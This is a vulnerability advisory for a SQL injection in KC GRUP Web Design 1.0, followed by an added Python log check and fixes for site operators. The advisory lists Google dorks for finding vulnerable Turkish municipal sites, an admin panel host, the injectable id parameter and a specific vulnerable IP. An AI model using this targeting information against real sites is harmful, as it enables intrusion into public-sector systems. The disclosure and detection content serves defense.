KC GRUP Web Design version 1.0 suffers from a remote SQL injection vulnerability.
4a961ba375685bf4edbb7386d1990d4e
#################################################################################################
# Exploit Title : KC GRUP Web Design 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/12/2018
# Vendor Homepage : kcgrup.com ~ kcgrupsms.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks :
intext:''Copyright © 2014-2018 Belediye - Tüm hakları saklıdır. - Design by KC GRUP''
intext:Design by KC GRUP - Belediye Sitesi site:bel.tr
inurl:''/haberdetay.php?id=''
intext:Design by KC GRUP'' site:bel.tr
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2260
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Admin Panel Login Path :
panel.kcgrupsms.com
#################################################################################################
# SQL Injection Exploit :
/haberdetay.php?id=[SQL Injection]
#################################################################################################
# Example Vulnerable Sites =>
Turkish Government official municipality websites are vulnerable to this security issue.
The IP address 85.95.249.117 is vulnerable.
#################################################################################################
# Example SQL Database Error :
Warning: Cannot modify header information - headers already sent by (output started at /home/guce/public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line 101
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
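Added example, not part of the original advisory: a log check that site operators can run to find requests to /haberdetay.php whose id parameter is not a plain integer, which is the pattern the advisory describes. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumed input: Apache/nginx "combined" access-log lines.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
TARGET_SCRIPT = "/haberdetay.php"  # script named in the advisory
PARAM = "id"                       # parameter named in the advisory

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Dec/2018:10:00:01 +0300] "GET /haberdetay.php?id=86 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Dec/2018:10:00:05 +0300] "GET /haberdetay.php?id=86%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Dec/2018:10:00:09 +0300] "GET /haberdetay.php?id=86%2527 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Dec/2018:10:00:12 +0300] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding, e.g. %2527 -> %27 -> a single quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_value) for non-integer id values."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(TARGET_SCRIPT):
            continue
        # parse_qs decodes once and returns every occurrence of the parameter.
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = decode_fully(raw)
            if not re.fullmatch(r"\d{1,10}", value):
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits

if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

The same integer-only rule belongs in the application itself: cast or validate id before it reaches the query and bind it as a parameter, and turn off on-page PHP warnings so that errors such as the one shown above do not disclose filesystem paths.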